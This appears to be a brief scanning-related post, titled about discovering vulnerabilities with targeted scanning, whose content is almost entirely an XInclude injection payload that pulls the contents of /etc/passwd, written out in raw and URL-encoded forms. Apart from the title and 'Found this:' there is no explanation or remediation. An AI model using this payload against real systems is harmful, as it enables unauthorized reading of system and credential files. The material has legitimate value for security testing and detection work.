Discovering vulnerabilities quickly with targeted scanning


Found this:


<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
<foo+xmlns%3axi%3d"http%3a//www.w3.org/2001/XInclude">
+++++++<xi%3ainclude+parse%3d"text"+href%3d"file%3a///etc/passwd"/>
</foo>
